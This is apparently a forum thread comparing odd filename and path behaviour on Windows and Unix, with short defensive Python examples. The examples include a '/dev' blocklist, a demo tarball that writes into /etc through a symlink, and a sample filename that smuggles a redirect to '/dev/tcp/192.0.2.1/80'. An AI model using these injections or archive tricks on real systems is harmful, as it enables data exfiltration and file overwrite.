If you think Microsoft supports features long-term out of laziness then you haven't been paying attention. It's a very deliberate choice that helped them grow their business and keep customers.

Transitions are nice from a development perspective, but I can guarantee you'll never hear someone who uses your library say they're happy that they need to rewrite parts of their code.

Also, Windows doesn't have a monopoly on bizarre filenames, features, etc.; you can find plenty of such things in the *nix family as well.

Lastly, Rust is one of the few projects I've seen that has phenomenal Windows support. It's something that's really appreciated and is going to help them capture markets that other software won't.

> If you think Microsoft supports features long-term out of laziness then you haven't been paying attention.

Misreading. GP talked about MS's lazy long-term users; "lazy" applies to the users, not to Microsoft.

> Also, Windows doesn't have a monopoly on bizarre filenames, features, etc.; you can find plenty of such things in the *nix family as well.

Like what? I'm not aware of special file names in arbitrary directories. Only in known/documented ones like /proc or /dev.

I'd say *nix OSes are too lax in what they allow, as any name without a zero byte is valid.

In the order I happen to think of them: Filenames may be straightforward on the filesystem level, but a lot of UNIX programs do weird things with them. Many programs use "-" to mean STDIN or STDOUT, whichever is appropriate in context. Bash has a somewhat ill-conceived feature where it synthesizes a /dev/tcp/$host/$port filesystem that will write to TCP or UDP sockets. Most people don't know about this; a few people think it's a UNIX feature rather than a bash-ism.
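
As a minimal sketch of the "-" convention (the helper name open_input is made up for illustration and is not taken from any particular program), a tool typically special-cases the name itself before anything reaches the filesystem:

```python
import sys

def open_input(name):
    """Return a readable text stream for `name`, treating "-" as standard input."""
    # Hypothetical helper: the "-" check lives in the program, not in the kernel.
    if name == "-":
        return sys.stdin
    return open(name, "r")
```

With a helper like this, a file that really is called "-" can still be reached through a path such as "./-", because only the exact string "-" is special-cased.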

The fact that multiple /s will be normalized to be the same as one sometimes trips up security code or code trying to validate that some particular file isn't used (e.g., checking that the filename doesn't start with /dev or a list of other blacklisted directories will fail if the user passes //dev).
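
A rough sketch of that failure mode, assuming a made-up blocklist and hypothetical helper names (none of this comes from a real program):

```python
BLOCKED_PREFIXES = ("/dev", "/proc")  # illustrative list only

def naive_is_blocked(path):
    # Plain string check: "//dev/null" slips through because the text differs.
    return path.startswith(BLOCKED_PREFIXES)

def collapse_slashes(path):
    # Drop empty components so "//dev///null" becomes "/dev/null".
    parts = [p for p in path.split("/") if p]
    return ("/" if path.startswith("/") else "") + "/".join(parts)

def is_blocked(path):
    cleaned = collapse_slashes(path)
    # Match whole components so "/devices" is not mistaken for "/dev".
    return any(cleaned == p or cleaned.startswith(p + "/")
               for p in BLOCKED_PREFIXES)
```

Here naive_is_blocked("//dev/null") is False while is_blocked("//dev/null") is True. The slashes are collapsed by hand because Python's os.path.normpath keeps a leading "//" on POSIX. This still ignores ".." components and symlinks, so it is nowhere near a complete validator.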

Symlinks! Oh, gosh, symlinks. Were this not a stream-of-consciousness dump they probably should come first. You can do terrible things with symlinks, like upload a tarball or zip file that creates a symlink to an arbitrary location in the system, then use that symlink reference as a directory reference to plop a file down. (Some archivers prevent this, others don't.)
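
To make the archive trick concrete, here is a small sketch that builds such a tarball in memory and flags it before extraction. The function names and the "reject anything with links" policy are assumptions for illustration, not how any particular archiver behaves:

```python
import io
import tarfile

def suspicious_members(archive):
    """Return names of members that are links or use absolute or '..' paths."""
    flagged = []
    for member in archive.getmembers():
        parts = member.name.split("/")
        if member.issym() or member.islnk():
            flagged.append(member.name)
        elif member.name.startswith("/") or ".." in parts:
            flagged.append(member.name)
    return flagged

def build_demo_archive():
    """Build an in-memory tar: a symlink to /etc, then a file 'inside' it."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("innocent")
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc"
        tar.addfile(link)
        data = b"payload"
        dropped = tarfile.TarInfo("innocent/dropped.conf")
        dropped.size = len(data)
        tar.addfile(dropped, io.BytesIO(data))
    buf.seek(0)
    return buf
```

Opening the demo archive with tarfile.open(fileobj=build_demo_archive()) and passing it to suspicious_members flags the "innocent" symlink. The second member looks like an ordinary relative path, which is exactly why a naive extractor would follow the link and write into /etc.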

Also, /dev is just a convention; it's possible to place device nodes anywhere you want.

You can also pretty much mount arbitrary things in arbitrary places via bind mounts. Hard links can also cause some fun with code that assumes file systems aren't cyclic. Windows technically has a lot of these features, but they're harder to get to and less well known, whereas UNIX uses the various kinds of links in base Linux installs, so they're readily available.

Is there any particular reason not to have something like /dev/tcp as a real filesystem, rather than a pretend game that bash likes to play?

There were several implementations of that idea in the early 1980s. The following paper describes one of them.

"More Taste: Less Greed? or Sending UNIX to the Fat Farm"[0] describes a V7 derivative that had /dev/deuna, /dev/arp, /dev/ip, and /dev/udp.

[0] http://www.collyer.net/who/geoff/taste.pdf

Not many details, though. Oh well.

The code in Research Unix V8, V9, and V10 is available. Alcatel-Lucent made them public a couple of months ago[0]. Here are the relevant URLs and file paths within the archives. I already had them on my hard drive and it was easy to grep them. I removed a few columns from the output of tar.



  12738 Jul 25  1985 usr/sys/inet/tcp_device.c


  13461 Aug  6  1986 ./sys/inet.old/old/tcp_device.c
  13457 Feb  3  1987 ./sys/inet.old/tcp_device.c
  13457 Feb 24  1987 ./sys/inet/tcp_device.c


  13542 Feb 20  1990 lsys/inet/tcp_device.c
  13622 Mar  9  1992 sys/inet/tcp_device.c

Edited to fix formatting.

Oh, nice! But I can't find the right man page.

V8 doesn't have a /dev/tcp man page but the interface is documented at /usr/include/sys/inet/tcp_user.h[0].

Here are the commands I used to identify the right file.

    find . -type f -print0 | xargs -0 grep -I "/dev/tcp" | less

[0] https://pastebin.com/8RT5vpH6

Edited to add the command sequence for the historical record.

Edited again to fix wording of the first sentence.

That's not very well documented. How would someone use this?

V10 has a man page. Extract v10src.tar and look at man/adm/man4/tcp.4.

Okay, I took a quick look at it, and this seems way too awkward to use from a shell script. It's pretty much C only. I guess Plan 9 does better.


Actually, the stronger case is that the feature should be removed from bash. While it's hard to point at a specific security guarantee that UNIX makes that bash violates by making TCP available via the pseudo-file system, it is a non-trivial ambient contribution to general insecurity for UNIX systems. (People itching to reply to that sentence, please parse it carefully first; I chose the adjectives quite carefully. In particular, I did not just call UNIX "generally insecure".)

I find this surprising. If someone can run bash, they can do anything anyway. What am I missing?

Sometimes you don't get to "run bash", but just pass certain parameters, or add things on the end, or whatever other monstrosity an application programmer comes up with to use bash to do something. This allows you to do things like potentially redirect files to sockets of your choice, where you might exfiltrate data, or provide unexpected data to internal processes.

You would be correct in then pointing out that if you pass user parameters to bash without treating them as carefully as you'd treat radioactive waste, you're asking for trouble, and that /dev/tcp doesn't offer much that the various "nc"s don't. That's why I was sort of non-committal about condemning it; it's not like it is a massive breach of security. It's just one more thing that can surprise people if they're trying to lock a system down, and that's already a pretty long list. And since it's not clear to me that it could ever be a short list, I wanted to emphasize that I wasn't trying to condemn UNIX. It's just that it's a feature that doesn't add much but complexity to bash, while not really offering any functionality that isn't better done with nc or something, and on balance it probably ought to just be removed from an already complicated and security-sensitive program.
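
For the "radioactive waste" handling, one common precaution when a command string has to go through a shell is to quote every user-supplied piece. A minimal sketch, assuming a hypothetical build_command helper and a made-up hostile input:

```python
import shlex

def build_command(user_filename):
    # Hypothetical application code that must hand a command string to a shell.
    # shlex.quote makes the whole input one literal word, so ">" is not a redirect.
    return "cat -- " + shlex.quote(user_filename)

# Made-up hostile input that tries to redirect output into bash's /dev/tcp.
hostile = "notes.txt > /dev/tcp/192.0.2.1/80"
```

Parsing build_command(hostile) with shell rules yields exactly three words: cat, --, and the hostile string as a single filename argument. Passing an argument list to the program directly and skipping the shell altogether is usually the safer design when it is an option.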

I don't know about radioactive waste, but surely allowing untrusted user input into /dev is unrealistically sloppy. (Famous last words?)

I agree that having this as a bash feature versus just using nc doesn't seem to buy much. But I think having these in the actual file system is useful. So why not do both: expunge them from bash, and get them into /dev (or maybe /net, or wherever they belong)?

Symlinks are a poor example, IMO. Yes, they need to be carefully handled for security reasons. But they also offer great flexibility that is actually widely used, and that wouldn't be available through other mechanisms.

To paraphrase: Windows NUL is a poor example, IMO. Yes, it needs to be carefully handled for reasons. But it also offers great flexibility that is actually widely used, and that wouldn't be available through other mechanisms.

I rest my case. ;-)

While your reply is genuinely amusing (thank you), how is it actually true?

What do we gain from having NUL everywhere, as opposed to having it in only one specific location, e.g. root?

Also, as an aside, I thought it wasn't a magic file (nul), but rather a magic device (NUL:), which IMO makes a lot of sense.

But that's just not true. They offer less flexibility than would be available through a special namespace prefix like /dev.

It doesn't offer great flexibility though. It has characteristics that made it useful on ancient versions of DOS and now it only offers annoyances that we have to deal with.

Just look at Mac OS X, which is also from the Unix family. It has the feature of decomposing precomposed characters in file names, so if your software writes a file named "café" (caf\xc3\xa9), and later lists the directory, it will find a file named "café" (cafe\xcc\x81). That tends to confuse software which expects to find a file with the same name after creating it, like for instance git.

For a while, if you were in a team in which some developers were on Linux and others were on Mac OS X, and someone on the Linux side checked in a file named with a diacritic, on the Mac OS X side the file appeared to have been deleted (and a new untracked file with the "same name" appeared). Later git grew special code to work around this misfeature.
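
The byte sequences quoted above can be reproduced with Python's unicodedata module. This is only a sketch: plain NFD is used here as a stand-in for the filesystem's decomposition, which may differ in details, and same_filename is a hypothetical helper:

```python
import unicodedata

precomposed = "caf\u00e9"                               # what the program wrote
decomposed = unicodedata.normalize("NFD", precomposed)  # roughly what comes back

def same_filename(a, b):
    # Compare after normalizing both sides to one form (NFC here).
    return unicodedata.normalize("NFC", a) == unicodedata.normalize("NFC", b)
```

The two strings render identically but compare unequal, since one encodes to caf\xc3\xa9 and the other to cafe\xcc\x81 in UTF-8. Software that wants to find the file it just created has to compare names in a normalized form, as same_filename does.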

And yes, Linux has the "bizarre feature" of being way too permissive. A filename is a sequence of bytes of which only the null byte and the slash are forbidden, and only a single or double dot have special meaning; one can have files named with control characters, and/or with something which is not valid for the current character encoding (LC_CTYPE), leading to pain for languages which insist that a string must be always valid Unicode (this includes Rust).

But yeah, nothing compares to the madness that is forbidding simple names like "nul" or "con" or "aux" (alone or followed by any extension) in every single directory, made worse by the fact that you can create files with these names if you use a baroque escaping syntax (which is not available for every API), confusing every other program which does not carefully do the same.
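
A portable program that wants to avoid creating such names has to carry its own check. The sketch below is an approximation based on the commonly documented list of DOS device names; looks_reserved is a hypothetical helper, and the real Windows rules have more corner cases:

```python
# Commonly documented DOS device names (approximate list).
RESERVED = {"CON", "PRN", "AUX", "NUL"}
RESERVED |= {f"COM{i}" for i in range(1, 10)}
RESERVED |= {f"LPT{i}" for i in range(1, 10)}

def looks_reserved(filename):
    # Only the part before the first dot matters, compared case-insensitively.
    stem = filename.split(".", 1)[0].rstrip(" ").upper()
    return stem in RESERVED
```

So "nul", "aux.txt" and "CON.tar.gz" are all flagged, while "null" and "console.log" are not.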

And let's not forget about the fact that the file you just created might not be readable or writable the next instant, because some other process (usually some sort of "antivirus") decided to open it in an exclusive mode. I've seen several projects add retry loops when opening (or moving, or deleting) a file on Windows, to work around that issue.
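
Such a retry loop might look roughly like the following. The function name, attempt count, and backoff values are arbitrary assumptions, and the sketch relies on Python reporting a Windows sharing violation as PermissionError:

```python
import time

def retry_on_permission_error(operation, attempts=5, delay=0.05):
    """Call operation(); retry with exponential backoff on PermissionError."""
    for attempt in range(attempts):
        try:
            return operation()
        except PermissionError:
            # Give up after the last attempt and let the caller see the error.
            if attempt == attempts - 1:
                raise
            time.sleep(delay * (2 ** attempt))
```

A caller would wrap the fragile step, for example retry_on_permission_error(lambda: os.remove(path)) after importing os. The loop only hides short-lived locks; a file held open for a long time still fails once the attempts run out.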

> It has the feature of decomposing precomposed characters in file names

I was under the impression that the new APFS stopped trying to understand bytes in filenames at all, thereby switching from 'confusion' to [tableflip] as a policy (which is likely an improvement, but also amuses me on the basis it's nice to know [tableflip] is about the only response anybody has to certain unicode-isms)

(Note that Rust just requires the built-in string type to be valid Unicode; you are free to manipulate other kinds of strings, which is exactly how the OS string problem is solved. This also gives you a chance to explicitly handle the errors.)
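
Python handles the same problem in a different way, by smuggling undecodable bytes through its Unicode strings. A small sketch with hypothetical helper names; the "surrogateescape" error handler is the one Python uses for filenames on POSIX systems:

```python
raw_name = b"caf\xe9"  # Latin-1 bytes; not valid UTF-8

def to_text(name_bytes):
    # Undecodable bytes become lone surrogates instead of raising an error.
    return name_bytes.decode("utf-8", errors="surrogateescape")

def to_bytes(name_text):
    # Reverses to_text exactly, restoring the original bytes.
    return name_text.encode("utf-8", errors="surrogateescape")
```

The round trip to_bytes(to_text(raw_name)) returns the original bytes unchanged, whereas a strict raw_name.decode("utf-8") raises UnicodeDecodeError. The price is that the intermediate string is not valid Unicode, which is the trade-off Rust avoids by using a separate string type.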

    And let's not forget about the fact that the file you just
    created might not be readable or writable the next instant
    because some other process (usually some sort of
    "antivirus") decided to open it in an exclusive mode.

THIS. Spent quite a long time trying to reproduce a Windows-only bug with the old Rails 2 gem unpacker caused by exactly this; the code would create a directory "foo-1.2.3" and then immediately try to write files to it and fail because of an exclusive lock - on an empty directory.

Exclusive mode is useful when used for good reasons - i.e. to get snapshot semantics (no-one else can change this) while reading, or implement atomic changes (no-one else can see the change halfway) when writing.

The problem on Windows is that too many APIs decided that exclusive should be the default mode if none is specified - which is the safer choice in the sense that it gives the most guarantees (and the least surprise) to the caller, but arguably the adverse effects it causes on other apps are more surprising and harmful in the end.

I agree with the pain points that you described.

Each OS has its own set of weird, broken, and surprising behaviors, most of them in the name of backwards compatibility. There is a group of people who see one mess as bearable and all the others as totally brain-dead. Other groups have somewhat different opinions.

Everything sucks. Which one sucks less? I pick the one that I know more about.

Note that many OS operations in general require retry loops on POSIX systems.

Well, Windows technically supports files with the reserved names - if you use the right APIs - but they break many programs including Explorer. You could make an analogy to Unix filenames with spaces or newlines, which can be created but don't work properly with some tools. (For spaces, try 'make CFLAGS="-I/path/with spaces/"' - there is no way to escape it or otherwise make it work. Newlines break a lot of stuff.)

IIRC you can `make "CFLAGS=-I/path/with spaces/"`

That doesn't make a difference - regardless of where you put the opening quote, make gets the string "CFLAGS=-I/path/with spaces" as argv[1]. The quotes do help, as otherwise it gets split up into multiple arguments to make.
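
Python's shlex module follows POSIX shell quoting rules closely enough to illustrate this. It is a model of the shell's parsing, not the shell itself:

```python
import shlex

# Quote placed after the "=" versus quote placed before the variable name.
quote_after_equals = shlex.split('make CFLAGS="-I/path/with spaces/"')
quote_before_name = shlex.split('make "CFLAGS=-I/path/with spaces/"')

# Without any quotes the value is split into two separate arguments.
unquoted = shlex.split('make CFLAGS=-I/path/with spaces/')
```

Both quoted forms parse to the same two-element argument list, with 'CFLAGS=-I/path/with spaces/' as the single argument after make. The unquoted form produces three elements.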

But actually, I was wrong - GNU make passes strings to execute to the shell, so you can use nested quotes: CFLAGS='"-I/path/with/spaces"'. Not sure why I thought differently. The shell itself doesn't work this way, though: when it splits a variable into multiple arguments, it just splits by spaces rather than doing any fancier processing. So there are issues with shell scripts.
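
The difference between the two behaviors can be modeled in a few lines. This is a simplified sketch: shlex.split stands in for a shell parsing command text, str.split stands in for the splitting of an unquoted variable, and the cc command line is made up:

```python
import shlex

cflags = '"-I/path/with spaces"'  # variable value that itself contains quotes

# Model of make: paste the value into the command text, then let a shell parse it.
via_make = shlex.split("cc " + cflags + " -c foo.c")

# Model of an unquoted $CFLAGS in a shell script: split on whitespace only;
# quote characters inside the value are kept as literal text.
via_shell_var = ["cc"] + cflags.split() + ["-c", "foo.c"]
```

In the first model the compiler receives '-I/path/with spaces' as one argument. In the second it receives two broken pieces that still carry the literal quote characters, which is why the nested-quote trick does not carry over to shell scripts.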

The Windows command-line client for PostgreSQL used to produce confusing errors on my machine because my development source code directory happened to be called "C:\dev".

What constitutes "bizarre" depends a lot on what your prior assumptions are.
